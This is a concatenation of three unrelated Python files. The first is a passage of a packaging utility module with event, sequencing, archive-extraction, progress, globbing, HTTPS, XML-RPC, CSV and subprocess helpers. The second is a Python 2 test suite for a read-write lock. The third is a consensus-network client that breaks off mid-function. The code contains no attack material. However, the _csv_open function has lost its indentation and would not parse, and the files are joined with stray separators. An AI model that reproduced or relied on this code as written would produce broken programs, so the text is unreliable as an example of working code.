            full = os.path.join(self.base, entry)
            try:
                if os.path.islink(full) or os.path.isfile(full):
                    os.remove(full)
                elif os.path.isdir(full):
                    shutil.rmtree(full)
            except Exception:
                failures.append(full)
        return failures
class EventMixin(object):
    """
    A very simple publish/subscribe system.
    """
    def __init__(self):
        # event name -> deque of subscribers, in call order
        self._subscribers = {}

    def add(self, event, subscriber, append=True):
        """
        Add a subscriber for an event.

        :param event: The name of an event.
        :param subscriber: The subscriber to be added (and called when the
                           event is published).
        :param append: Whether to append or prepend the subscriber to an
                       existing subscriber list for the event.
        """
        subscribers = self._subscribers
        if event in subscribers:
            existing = subscribers[event]
            if append:
                existing.append(subscriber)
            else:
                existing.appendleft(subscriber)
        else:
            subscribers[event] = deque([subscriber])

    def remove(self, event, subscriber):
        """
        Remove a subscriber for an event.

        :param event: The name of an event.
        :param subscriber: The subscriber to be removed.
        :raises ValueError: if the event has no subscribers at all.
        """
        subscribers = self._subscribers
        if event not in subscribers:
            raise ValueError('No subscribers: %r' % event)
        subscribers[event].remove(subscriber)

    def get_subscribers(self, event):
        """
        Return an iterator for the subscribers for an event.
        :param event: The event to return subscribers for.
        """
        return iter(self._subscribers.get(event, ()))

    def publish(self, event, *args, **kwargs):
        """
        Publish a event and return a list of values returned by its
        subscribers.

        :param event: The event to publish.
        :param args: The positional arguments to pass to the event's
                     subscribers.
        :param kwargs: The keyword arguments to pass to the event's
                       subscribers.
        """
        results = []
        for handler in self.get_subscribers(event):
            try:
                outcome = handler(event, *args, **kwargs)
            except Exception:
                # A failing subscriber must not break the others.
                logger.exception('Exception during event publication')
                outcome = None
            results.append(outcome)
        logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
                     event, args, kwargs, results)
        return results
#
# Simple sequencing
#
class Sequencer(object):
    """
    Maintain a graph of 'steps' (predecessor/successor edges plus
    isolated nodes) and compute orderings over it.
    """
    def __init__(self):
        self._preds = {}  # step -> set of its predecessors
        self._succs = {}  # step -> set of its successors
        self._nodes = set()  # nodes with no preds/succs

    def add_node(self, node):
        """Register an isolated node (one with no edges)."""
        self._nodes.add(node)

    def remove_node(self, node, edges=False):
        """
        Remove *node* from the isolated-node set; when *edges* is true,
        also remove any edges incident on it.
        """
        if node in self._nodes:
            self._nodes.remove(node)
        if edges:
            for p in set(self._preds.get(node, ())):
                self.remove(p, node)
            for s in set(self._succs.get(node, ())):
                self.remove(node, s)
            # Remove empties
            for k, v in list(self._preds.items()):
                if not v:
                    del self._preds[k]
            for k, v in list(self._succs.items()):
                if not v:
                    del self._succs[k]

    def add(self, pred, succ):
        """Record an edge: *pred* must come before *succ*."""
        assert pred != succ
        self._preds.setdefault(succ, set()).add(pred)
        self._succs.setdefault(pred, set()).add(succ)

    def remove(self, pred, succ):
        """
        Remove the pred -> succ edge.

        :raises ValueError: if the edge is not present.
        """
        assert pred != succ
        try:
            preds = self._preds[succ]
            succs = self._succs[pred]
        except KeyError:  # pragma: no cover
            raise ValueError('%r not a successor of anything' % succ)
        try:
            preds.remove(pred)
            succs.remove(succ)
        except KeyError:  # pragma: no cover
            raise ValueError('%r not a successor of %r' % (succ, pred))

    def is_step(self, step):
        """Return True if *step* is known (as a node or via any edge)."""
        return (step in self._preds or step in self._succs or
                step in self._nodes)

    def get_steps(self, final):
        """
        Return the steps required to reach *final*, in dependency order
        (predecessors first; *final* is last).

        :raises ValueError: if *final* is not a known step.
        """
        if not self.is_step(final):
            raise ValueError('Unknown: %r' % final)
        result = []
        todo = []
        seen = set()
        todo.append(final)
        while todo:
            step = todo.pop(0)
            if step in seen:
                # if a step was already seen,
                # move it to the end (so it will appear earlier
                # when reversed on return) ... but not for the
                # final step, as that would be confusing for
                # users
                if step != final:
                    result.remove(step)
                    result.append(step)
            else:
                seen.add(step)
                result.append(step)
                preds = self._preds.get(step, ())
                todo.extend(preds)
        return reversed(result)

    @property
    def strong_connections(self):
        # Tarjan's algorithm over the successor graph; each returned
        # tuple is one strongly connected component.
        #http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
        index_counter = [0]
        stack = []
        lowlinks = {}
        index = {}
        result = []

        graph = self._succs

        def strongconnect(node):
            # set the depth index for this node to the smallest unused index
            index[node] = index_counter[0]
            lowlinks[node] = index_counter[0]
            index_counter[0] += 1
            stack.append(node)

            # Consider successors
            try:
                successors = graph[node]
            except Exception:
                successors = []
            for successor in successors:
                if successor not in lowlinks:
                    # Successor has not yet been visited
                    strongconnect(successor)
                    lowlinks[node] = min(lowlinks[node],lowlinks[successor])
                elif successor in stack:
                    # the successor is in the stack and hence in the current
                    # strongly connected component (SCC)
                    lowlinks[node] = min(lowlinks[node],index[successor])

            # If `node` is a root node, pop the stack and generate an SCC
            if lowlinks[node] == index[node]:
                connected_component = []

                while True:
                    successor = stack.pop()
                    connected_component.append(successor)
                    if successor == node: break
                component = tuple(connected_component)
                # storing the result
                result.append(component)

        for node in graph:
            if node not in lowlinks:
                strongconnect(node)

        return result

    @property
    def dot(self):
        """Render the graph in Graphviz DOT format."""
        result = ['digraph G {']
        for succ in self._preds:
            preds = self._preds[succ]
            for pred in preds:
                result.append(' %s -> %s;' % (pred, succ))
        for node in self._nodes:
            result.append(' %s;' % node)
        result.append('}')
        return '\n'.join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
    """
    Unpack an archive (zip/whl/tar/tgz/tbz) into *dest_dir*.

    :param archive_filename: Path of the archive to unpack.
    :param dest_dir: Directory to extract into.
    :param format: One of 'zip', 'tgz', 'tbz', 'tar'; inferred from the
                   filename extension when None.
    :param check: If true, validate member paths first so a crafted
                  archive cannot write outside *dest_dir*.
    :raises ValueError: for an unknown format or an unsafe member path.
    """
    def check_path(path):
        # Reject archive members that would escape dest_dir.
        if not isinstance(path, text_type):
            path = path.decode('utf-8')
        p = os.path.abspath(os.path.join(dest_dir, path))
        # Slicing (not indexing) avoids an IndexError when a member
        # resolves to dest_dir itself (e.g. a '.' entry), while still
        # rejecting mere prefix matches such as '<dest_dir>-evil'.
        if not p.startswith(dest_dir) or p[plen:plen + 1] not in ('', os.sep):
            raise ValueError('path outside destination: %r' % p)

    dest_dir = os.path.abspath(dest_dir)
    plen = len(dest_dir)
    archive = None
    if format is None:
        if archive_filename.endswith(('.zip', '.whl')):
            format = 'zip'
        elif archive_filename.endswith(('.tar.gz', '.tgz')):
            format = 'tgz'
        elif archive_filename.endswith(('.tar.bz2', '.tbz')):
            format = 'tbz'
        elif archive_filename.endswith('.tar'):
            format = 'tar'
        else:  # pragma: no cover
            raise ValueError('Unknown format for %r' % archive_filename)
    # Map tar variants to their open mode here (rather than only inside
    # the inference branch above) so that an explicitly passed format
    # also works; previously 'mode' was unbound in that case.
    tar_modes = {'tgz': 'r:gz', 'tbz': 'r:bz2', 'tar': 'r'}
    try:
        if format == 'zip':
            archive = ZipFile(archive_filename, 'r')
            if check:
                names = archive.namelist()
                for name in names:
                    check_path(name)
        else:
            archive = tarfile.open(archive_filename, tar_modes[format])
            if check:
                names = archive.getnames()
                for name in names:
                    check_path(name)
        if format != 'zip' and sys.version_info[0] < 3:
            # See Python issue 17153. If the dest path contains Unicode,
            # tarfile extraction fails on Python 2.x if a member path name
            # contains non-ASCII characters - it leads to an implicit
            # bytes -> unicode conversion using ASCII to decode.
            for tarinfo in archive.getmembers():
                if not isinstance(tarinfo.name, text_type):
                    tarinfo.name = tarinfo.name.decode('utf-8')
        archive.extractall(dest_dir)
    finally:
        if archive:
            archive.close()
def zip_dir(directory):
    """zip a directory tree into a BytesIO object"""
    buf = io.BytesIO()
    prefix_len = len(directory)
    with ZipFile(buf, "w") as zf:
        for root, dirs, files in os.walk(directory):
            for fname in files:
                src = os.path.join(root, fname)
                # archive name is the path relative to `directory`
                arcname = os.path.join(root[prefix_len:], fname)
                zf.write(src, arcname)
    return buf
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G', 'T', 'P')

class Progress(object):
    """
    Track the progress of a long-running operation: current/maximum
    counters, percentage, mean transfer speed and an ETA estimate.
    """
    unknown = 'UNKNOWN'

    def __init__(self, minval=0, maxval=100):
        # maxval may be None, meaning the total size is unknown.
        assert maxval is None or maxval >= minval
        self.min = self.cur = minval
        self.max = maxval
        self.started = None
        self.elapsed = 0
        self.done = False

    def update(self, curval):
        """Set the current value and refresh the elapsed-time counter."""
        assert self.min <= curval
        assert self.max is None or curval <= self.max
        self.cur = curval
        now = time.time()
        if self.started is None:
            self.started = now
        else:
            self.elapsed = now - self.started

    def increment(self, incr):
        """Advance the current value by a non-negative amount."""
        assert incr >= 0
        self.update(self.cur + incr)

    def start(self):
        """Mark the start of the operation; returns self for chaining."""
        self.update(self.min)
        return self

    def stop(self):
        """Mark the operation as finished."""
        if self.max is not None:
            self.update(self.max)
        self.done = True

    @property
    def maximum(self):
        """The maximum value, or 'UNKNOWN' when unbounded."""
        return self.unknown if self.max is None else self.max

    @property
    def percentage(self):
        """Progress rendered as a fixed-width string such as ' 42 %'."""
        if self.done:
            return '100 %'
        if self.max is None:
            return ' ?? %'
        fraction = 100.0 * (self.cur - self.min) / (self.max - self.min)
        return '%3d %%' % fraction

    def format_duration(self, duration):
        """Render a duration as HH:MM:SS, or '??:??:??' when unknown."""
        if (duration <= 0) and self.max is None or self.cur == self.min:
            return '??:??:??'
        #elif duration < 1:
        #    return '--:--:--'
        return time.strftime('%H:%M:%S', time.gmtime(duration))

    @property
    def ETA(self):
        """Estimated time remaining (or total elapsed time, once done)."""
        if self.done:
            prefix = 'Done'
            t = self.elapsed
        else:
            prefix = 'ETA '
            if self.max is None:
                t = -1
            elif self.elapsed == 0 or (self.cur == self.min):
                t = 0
            else:
                # Scale elapsed time by the fraction of work remaining.
                t = float(self.max - self.min)
                t /= self.cur - self.min
                t = (t - 1) * self.elapsed
        return '%s: %s' % (prefix, self.format_duration(t))

    @property
    def speed(self):
        """Mean rate as a human-readable string, e.g. '3 KB/s'."""
        if self.elapsed == 0:
            rate = 0.0
        else:
            rate = (self.cur - self.min) / self.elapsed
        for unit in UNITS:
            if rate < 1000:
                break
            rate /= 1000.0
        return '%d %sB/s' % (rate, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')

def iglob(path_glob):
    """Extended globbing function that supports ** and {opt1,opt2,opt3}."""
    # Validate the pattern before delegating to the recursive worker.
    if _CHECK_RECURSIVE_GLOB.search(path_glob):
        raise ValueError(
            """invalid glob %r: recursive glob "**" must be used alone"""
            % path_glob)
    if _CHECK_MISMATCH_SET.search(path_glob):
        raise ValueError(
            """invalid glob %r: mismatching set marker '{' or '}'"""
            % path_glob)
    return _iglob(path_glob)
def _iglob(path_glob):
    """Recursive worker for :func:`iglob` (performs no validation)."""
    parts = RICH_GLOB.split(path_glob, 1)
    if len(parts) > 1:
        # Expand the first {a,b,c} alternation and recurse per branch.
        assert len(parts) == 3, parts
        prefix, options, suffix = parts
        for option in options.split(','):
            for path in _iglob(''.join((prefix, option, suffix))):
                yield path
    elif '**' not in path_glob:
        for match in std_iglob(path_glob):
            yield match
    else:
        prefix, radical = path_glob.split('**', 1)
        if prefix == '':
            prefix = '.'
        if radical == '':
            radical = '*'
        else:
            # we support both '/' and '\' separators after '**'
            radical = radical.lstrip('/')
            radical = radical.lstrip('\\')
        for path, _dirs, _files in os.walk(prefix):
            path = os.path.normpath(path)
            for found in _iglob(os.path.join(path, radical)):
                yield found
if ssl:
    from .compat import (HTTPSHandler as BaseHTTPSHandler, match_hostname,
                         CertificateError)

    #
    # HTTPSConnection which verifies certificates/matches domains
    #

    class HTTPSConnection(httplib.HTTPSConnection):
        """HTTPS connection that can verify the server certificate and
        check that it matches the requested host."""
        ca_certs = None # set this to the path to the certs file (.pem)
        check_domain = True # only used if ca_certs is not None

        # noinspection PyPropertyAccess
        def connect(self):
            # Open the TCP connection, then wrap it in TLS.  The first
            # branch handles interpreters without ssl.SSLContext; the
            # second uses a context.
            sock = socket.create_connection((self.host, self.port), self.timeout)
            if getattr(self, '_tunnel_host', False):
                self.sock = sock
                self._tunnel()

            if not hasattr(ssl, 'SSLContext'):
                # For 2.x
                if self.ca_certs:
                    cert_reqs = ssl.CERT_REQUIRED
                else:
                    cert_reqs = ssl.CERT_NONE
                # NOTE(review): ssl.wrap_socket and PROTOCOL_SSLv23 are
                # legacy APIs removed in modern Python; this branch only
                # targets old interpreters.
                self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
                                            cert_reqs=cert_reqs,
                                            ssl_version=ssl.PROTOCOL_SSLv23,
                                            ca_certs=self.ca_certs)
            else: # pragma: no cover
                context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
                if hasattr(ssl, 'OP_NO_SSLv2'):
                    context.options |= ssl.OP_NO_SSLv2
                if self.cert_file:
                    context.load_cert_chain(self.cert_file, self.key_file)
                kwargs = {}
                if self.ca_certs:
                    context.verify_mode = ssl.CERT_REQUIRED
                    context.load_verify_locations(cafile=self.ca_certs)
                    if getattr(ssl, 'HAS_SNI', False):
                        kwargs['server_hostname'] = self.host
                self.sock = context.wrap_socket(sock, **kwargs)
            if self.ca_certs and self.check_domain:
                try:
                    match_hostname(self.sock.getpeercert(), self.host)
                    logger.debug('Host verified: %s', self.host)
                except CertificateError: # pragma: no cover
                    # Tear the socket down before propagating the error.
                    self.sock.shutdown(socket.SHUT_RDWR)
                    self.sock.close()
                    raise

    class HTTPSHandler(BaseHTTPSHandler):
        """urllib-style handler that opens verified HTTPSConnections."""
        def __init__(self, ca_certs, check_domain=True):
            BaseHTTPSHandler.__init__(self)
            self.ca_certs = ca_certs
            self.check_domain = check_domain

        def _conn_maker(self, *args, **kwargs):
            """
            This is called to create a connection instance. Normally you'd
            pass a connection class to do_open, but it doesn't actually check for
            a class, and just expects a callable. As long as we behave just as a
            constructor would have, we should be OK. If it ever changes so that
            we *must* pass a class, we'll create an UnsafeHTTPSConnection class
            which just sets check_domain to False in the class definition, and
            choose which one to pass to do_open.
            """
            result = HTTPSConnection(*args, **kwargs)
            if self.ca_certs:
                result.ca_certs = self.ca_certs
                result.check_domain = self.check_domain
            return result

        def https_open(self, req):
            try:
                return self.do_open(self._conn_maker, req)
            except URLError as e:
                # Translate verification failures into CertificateError.
                if 'certificate verify failed' in str(e.reason):
                    raise CertificateError('Unable to verify server certificate '
                                           'for %s' % req.host)
                else:
                    raise

    #
    # To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
    # Middle proxy using HTTP listens on port 443, or an index mistakenly serves
    # HTML containing a http://xyz link when it should be https://xyz),
    # you can use the following handler class, which does not allow HTTP traffic.
    #
    # It works by inheriting from HTTPHandler - so build_opener won't add a
    # handler for HTTP itself.
    #
    class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
        """Handler that refuses plain-HTTP requests outright."""
        def http_open(self, req):
            raise URLError('Unexpected HTTP request on what should be a secure '
                           'connection: %s' % req)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]

if _ver_info == (2, 6):
    # Python 2.6 compatibility: its xmlrpclib builds connections via the
    # HTTP/HTTPS facade classes, which don't accept a timeout.  These
    # shims forward **kwargs (including timeout) to the underlying
    # connection class.
    class HTTP(httplib.HTTP):
        def __init__(self, host='', port=None, **kwargs):
            if port == 0: # 0 means use port 0, not the default port
                port = None
            self._setup(self._connection_class(host, port, **kwargs))

    if ssl:
        class HTTPS(httplib.HTTPS):
            def __init__(self, host='', port=None, **kwargs):
                if port == 0: # 0 means use port 0, not the default port
                    port = None
                self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
    """xmlrpclib Transport carrying a per-instance timeout."""
    def __init__(self, timeout, use_datetime=0):
        self.timeout = timeout
        xmlrpclib.Transport.__init__(self, use_datetime)

    def make_connection(self, host):
        """Create (or reuse) the HTTP connection for *host*."""
        h, eh, x509 = self.get_host_info(host)
        if _ver_info == (2, 6):
            result = HTTP(h, timeout=self.timeout)
        else:
            # NOTE(review): self.timeout is not applied on this path --
            # HTTPConnection is created without it; confirm intended.
            if not self._connection or host != self._connection[0]:
                self._extra_headers = eh
                self._connection = host, httplib.HTTPConnection(h)
            result = self._connection[1]
        return result
if ssl:
    class SafeTransport(xmlrpclib.SafeTransport):
        """xmlrpclib SafeTransport (HTTPS) carrying a per-instance timeout."""
        def __init__(self, timeout, use_datetime=0):
            self.timeout = timeout
            xmlrpclib.SafeTransport.__init__(self, use_datetime)

        def make_connection(self, host):
            """Create (or reuse) the HTTPS connection for *host*."""
            h, eh, kwargs = self.get_host_info(host)
            if not kwargs:
                kwargs = {}
            # Propagate the timeout to the connection keyword arguments.
            kwargs['timeout'] = self.timeout
            if _ver_info == (2, 6):
                result = HTTPS(host, None, **kwargs)
            else:
                if not self._connection or host != self._connection[0]:
                    self._extra_headers = eh
                    self._connection = host, httplib.HTTPSConnection(h, None,
                                                                     **kwargs)
                result = self._connection[1]
            return result
class ServerProxy(xmlrpclib.ServerProxy):
    """ServerProxy accepting an optional ``timeout`` keyword, honoured by
    substituting the timeout-aware Transport/SafeTransport above."""
    def __init__(self, uri, **kwargs):
        self.timeout = timeout = kwargs.pop('timeout', None)
        # The above classes only come into play if a timeout
        # is specified
        if timeout is not None:
            scheme, _ = splittype(uri)
            use_datetime = kwargs.get('use_datetime', 0)
            if scheme == 'https':
                tcls = SafeTransport
            else:
                tcls = Transport
            kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
            self.transport = t
        xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
# Python 3 determines encoding from locale. Force 'utf-8'
# file encoding to match other forced utf-8 encoding
kwargs['encoding'] = 'utf-8'
return open(fn, mode, **kwargs)
class CSVBase(object):
    """Shared csv dialect settings plus context-manager support."""
    # The strs are used because we need native str in the csv API
    # (2.x won't take Unicode).
    defaults = {
        'delimiter': str(','),
        'quotechar': str('"'),
        'lineterminator': str('\n')
    }

    def __enter__(self):
        return self

    def __exit__(self, *exc_info):
        # Close the underlying stream regardless of errors.
        self.stream.close()
class CSVReader(CSVBase):
    """Iterate rows from a CSV stream or path, yielding text values."""
    def __init__(self, **kwargs):
        """
        :param stream: A binary stream to read from, or
        :param path: a file path to open (one of the two is required).
        """
        if 'stream' in kwargs:
            stream = kwargs['stream']
            if sys.version_info[0] >= 3:
                # needs to be a text stream
                stream = codecs.getreader('utf-8')(stream)
            self.stream = stream
        else:
            self.stream = _csv_open(kwargs['path'], 'r')
        self.reader = csv.reader(self.stream, **self.defaults)

    def __iter__(self):
        return self

    def next(self):
        row = next(self.reader)
        if sys.version_info[0] < 3:
            # 2.x csv yields bytes: decode each cell to unicode.
            for i, cell in enumerate(row):
                if not isinstance(cell, text_type):
                    row[i] = cell.decode('utf-8')
        return row

    __next__ = next
class CSVWriter(CSVBase):
    """Write rows to a CSV file, encoding text values on 2.x."""
    def __init__(self, fn, **kwargs):
        self.stream = _csv_open(fn, 'w')
        self.writer = csv.writer(self.stream, **self.defaults)

    def writerow(self, row):
        if sys.version_info[0] < 3:
            # 2.x csv wants bytes: encode any unicode cells.
            encoded = []
            for cell in row:
                if isinstance(cell, text_type):
                    cell = cell.encode('utf-8')
                encoded.append(cell)
            row = encoded
        self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
    """
    Configurator adding an 'inc' (include) value converter and support
    for instantiating objects described by dicts containing a '()' key.
    """

    value_converters = dict(BaseConfigurator.value_converters)
    value_converters['inc'] = 'inc_convert'

    def __init__(self, config, base=None):
        super(Configurator, self).__init__(config)
        # Base directory used to resolve relative inc:// includes.
        self.base = base or os.getcwd()

    def configure_custom(self, config):
        """
        Instantiate the object described by *config*: '()' names the
        callable, '[]' gives positional args, '.' gives attributes to
        set afterwards, and the remaining valid-identifier keys become
        keyword arguments.
        """
        def convert(o):
            # Recursively convert containers, instantiating any nested
            # dicts that themselves carry a '()' key.
            if isinstance(o, (list, tuple)):
                result = type(o)([convert(i) for i in o])
            elif isinstance(o, dict):
                if '()' in o:
                    result = self.configure_custom(o)
                else:
                    result = {}
                    for k in o:
                        result[k] = convert(o[k])
            else:
                result = self.convert(o)
            return result

        c = config.pop('()')
        if not callable(c):
            c = self.resolve(c)
        props = config.pop('.', None)
        # Check for valid identifiers
        args = config.pop('[]', ())
        if args:
            args = tuple([convert(o) for o in args])
        items = [(k, convert(config[k])) for k in config if valid_ident(k)]
        kwargs = dict(items)
        result = c(*args, **kwargs)
        if props:
            for n, v in props.items():
                setattr(result, n, convert(v))
        return result

    def __getitem__(self, key):
        result = self.config[key]
        # Lazily instantiate '()' descriptions on first access and cache
        # the constructed object back into the config.
        if isinstance(result, dict) and '()' in result:
            self.config[key] = result = self.configure_custom(result)
        return result

    def inc_convert(self, value):
        """Default converter for the inc:// protocol."""
        if not os.path.isabs(value):
            value = os.path.join(self.base, value)
        with codecs.open(value, 'r', encoding='utf-8') as f:
            result = json.load(f)
        return result
class SubprocessMixin(object):
    """
    Mixin for running subprocesses and capturing their output
    """
    def __init__(self, verbose=False, progress=None):
        # When progress is set it receives (line, context) callbacks;
        # otherwise output is summarised ('.') or echoed (verbose).
        self.verbose = verbose
        self.progress = progress

    def reader(self, stream, context):
        """
        Read lines from a subprocess' output stream and either pass to a progress
        callable (if specified) or write progress information to sys.stderr.
        """
        progress = self.progress
        verbose = self.verbose
        while True:
            line = stream.readline()
            if not line:
                break
            if progress is not None:
                progress(line, context)
            else:
                if verbose:
                    sys.stderr.write(line.decode('utf-8'))
                else:
                    sys.stderr.write('.')
                sys.stderr.flush()
        stream.close()

    def run_command(self, cmd, **kwargs):
        """
        Run *cmd*, draining stdout/stderr through :meth:`reader` threads.

        :return: The completed Popen object.
        """
        p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE, **kwargs)
        drainers = [
            threading.Thread(target=self.reader, args=(p.stdout, 'stdout')),
            threading.Thread(target=self.reader, args=(p.stderr, 'stderr')),
        ]
        for t in drainers:
            t.start()
        p.wait()
        for t in drainers:
            t.join()
        if self.progress is not None:
            self.progress('done.', 'main')
        elif self.verbose:
            sys.stderr.write('done.\n')
        return p
def normalize_name(name):
    """Normalize a python package name a la PEP 503"""
    # https://www.python.org/dev/peps/pep-0503/#normalized-names
    collapsed = re.sub('[-_.]+', '-', name)
    return collapsed.lower()
|
test_rwlock.py | from threading import Thread, current_thread
from time import sleep
from unittest import TestCase
from pyff.locks import ReadWriteLock
class TestReadWriteLock(TestCase):
    """
    Tests for pyff.locks.ReadWriteLock: acquisition, read->write
    upgrades, timeouts, double release and deadlock behaviour.
    (Python 2 code: print statements and `except E, ex` clauses.)
    """
    def setUp(self):
        self.lock = ReadWriteLock()
        self.readers = 0
        self.writer_active = False
        self.exceptions = dict()
    def reset(self):
        # Clear exceptions recorded by worker threads.
        self.exceptions = dict()
    def test_error_on_release_unheld_lock(self):
        # Releasing a never-acquired lock must raise ValueError.
        try:
            self.lock.release()
            assert False
        except ValueError:
            pass
    def timeout_writer(self, timeout=1):
        # Repeatedly take read locks, upgrade to write, then hold the
        # write lock; exceptions are recorded for the main thread.
        try:
            for tries in range(1, 10):
                self.lock.acquireRead(timeout=timeout, blocking=False) # get a read
            for tries in range(1, 10):
                self.lock.acquireWrite(timeout=timeout, blocking=False) # upgrade to write
            self.lock.acquireWrite(blocking=True) # get it twice...
            print "thread (writer): %s starting" % current_thread().name
            self.writer_active = True
            sleep(1)
        except Exception, ex:
            self.exceptions[current_thread().name] = ex
        finally:
            try:
                self.lock.release()
            except ValueError: # ignore double release error
                pass
            self.writer_active = False
            print "thread: %s exiting" % current_thread().name
    def timeout_reader(self, to_wait_for, timeout=1):
        # Take a read lock and wait until enough readers are active.
        try:
            self.lock.acquireRead(timeout=timeout)
            assert(not self.writer_active)
            print "thread (reader): %s starting" % current_thread().name
            self.readers += 1
            while to_wait_for - self.readers > 0:
                assert(not self.writer_active)
                print "waiting for %d more readers" % (to_wait_for - self.readers)
                sleep(0.1)
        except Exception, ex:
            self.exceptions[current_thread().name] = ex
        finally:
            try:
                self.lock.release()
            except ValueError: # ignore double release error
                pass
            print "thread (reader): %s exiting" % current_thread().name
    def writer(self):
        # Hold the write lock via context manager; also checks a writer
        # can take a read lock while writing.
        try:
            with self.lock.writelock:
                print "thread (writer): %s starting" % current_thread().name
                self.writer_active = True
                self.lock.acquireRead(timeout=0.1) # make sure we can get a readlock as a writer
                sleep(1)
                self.writer_active = False
                print "thread: %s exiting" % current_thread().name
        except Exception, ex:
            self.exceptions[current_thread().name] = ex
        finally:
            try:
                self.lock.release()
            except ValueError: # ignore double release error
                pass
    def reader(self, to_wait_for):
        # Reader using the context manager; waits for other readers.
        try:
            with self.lock.readlock:
                assert(not self.writer_active)
                print "thread (reader): %s starting" % current_thread().name
                self.readers += 1
                while to_wait_for - self.readers > 0:
                    assert(not self.writer_active)
                    print "waiting for %d more readers" % (to_wait_for - self.readers)
                    sleep(0.1)
                print "thread (reader): %s exiting" % current_thread().name
        except Exception, ex:
            self.exceptions[current_thread().name] = ex
    def _raise(self, t):
        # Re-raise any exception recorded by the finished thread *t*.
        assert (not t.isAlive())
        if t.name in self.exceptions:
            raise self.exceptions[t.name]
    def _rww(self, timeout=1, to_wait_for=2):
        # read -> spin for peers -> write -> write again: used to
        # provoke a deadlock that must resolve via timeout.
        try:
            self.lock.acquireRead(timeout=timeout)
            self.readers += 1
            while to_wait_for - self.readers > 0:
                pass
            self.lock.acquireWrite(timeout=timeout)
            self.lock.acquireWrite(timeout=timeout)
        except Exception, ex:
            self.exceptions[current_thread().name] = ex
    def test_unthreaded(self):
        # A single thread may freely re-acquire and upgrade the lock.
        try:
            self.lock.acquireRead(timeout=0.01)
            self.lock.acquireWrite(timeout=0.01)
            self.lock.acquireRead(timeout=0.01)
            self.lock.acquireWrite(timeout=0.01)
        except Exception, ex:
            raise ex
        finally:
            try:
                self.lock.release()
            except:
                pass
    def test_deadlock(self):
        # Many threads doing read->write upgrades must time out with
        # ValueError rather than deadlocking forever.
        self.reset()
        try:
            w = []
            for i in range(0, 10):
                w.append(Thread(target=self._rww, name="w%s" % i))
            for i in range(0, 10):
                w[i].start()
            for i in range(0, 10):
                w[i].join()
            for i in range(0, 10):
                self._raise(w[i])
            assert False
        except ValueError, ex:
            pass
    def test_2_readers_and_3_writers(self):
        # Mixed readers/writers; w3 uses tiny timeouts and is expected
        # to fail with ValueError or RuntimeError.
        self.reset()
        w1 = Thread(target=self.writer, name="w1")
        w2 = Thread(target=self.writer, name="w2")
        w3 = Thread(target=self.timeout_writer, name="w3", args=[0.01])
        r1 = Thread(target=self.reader, name="r1", args=[2])
        r2 = Thread(target=self.reader, name="r2", args=[2])
        w1.start()
        r1.start()
        w2.start()
        w3.start()
        r2.start()
        w1.join(timeout=60)
        self._raise(w1)
        r1.join(timeout=60)
        self._raise(r1)
        r2.join(timeout=60)
        self._raise(r2)
        w2.join(timeout=60)
        w3.join(timeout=60)
        try:
            self._raise(w3)
            assert False
        except ValueError:
            pass
        except RuntimeError:
            pass
|
client.py | import collections
from multiprocessing import Process, Queue
import urllib
import requests
from bos_consensus.common import Message
from bos_consensus.util import logger
MessageInfo = collections.namedtuple(
'MessageInfo',
('ip', 'port', 'message'),
)
def send_message(message_info):
    """
    Serialize the payload in *message_info* and POST it to the node's
    '/send_message' endpoint.

    :param message_info: A MessageInfo namedtuple (ip, port, message).
    :return: The sent Message, or None if anything failed.
    """
    assert isinstance(message_info, MessageInfo)
    log = logger.get_logger('client')
    log.debug('loaded message: %s', message_info)
    endpoint = 'http://%s:%s' % (message_info.ip, message_info.port)
    try:
        message = Message.new(message_info.message)
        response = requests.post(
            urllib.parse.urljoin(endpoint, '/send_message'),
            data=message.serialize(to_string=True),
        )
        response.raise_for_status()
        log.debug('message sent!')
    except Exception as e:
        # NOTE(review): this logs a connection error for *any* failure
        # (serialization and HTTP-status errors included) and discards
        # the original exception `e` -- consider logging it as well.
        log.error("ConnectionError occurred during client send message to '%s'!" % endpoint)
        return
    return message
def _send_message_multiple_one(queue, message, endpoint):
    """
    Worker: POST a single *message* to *endpoint* and report success
    (True/False) on *queue*.
    """
    log = logger.get_logger('client')
    try:
        # NOTE(review): `endpoint.join('/send_message')` is str.join
        # semantics if endpoint is a string -- urllib.parse.urljoin
        # (as used in send_message) was probably intended.  Confirm
        # endpoint's actual type before changing.
        response = requests.post(
            endpoint.join('/send_message'),
            data=message.serialize(to_string=True),
        )
        response.raise_for_status()
        log.debug('sent message, %s to %s', message, endpoint)
    except Exception as e:
        log.error("failed to send message, %s to %s", message, endpoint)
        queue.put(False)
        return
    queue.put(True)
    return
def _send_message_multiple(queue, message, endpoint):
    """
    Send *message* to *endpoint* ``m`` times in parallel (creating a
    fresh Message per request when *message* is None) and push the list
    of messages back onto *queue*.

    :param queue: Queue the list of sent messages is reported through.
    :param message: Message to send, or None to create one per request.
    :param endpoint: Mapping-like endpoint; its 'm' key is the number of
                     messages to send (default 1).
    """
    create_new_message = message is None
    messages = [message] if message is not None else list()
    number_of_messages = int(endpoint.get('m', 1))
    q = Queue(maxsize=number_of_messages)
    workers = []
    for i in range(number_of_messages):
        if create_new_message:
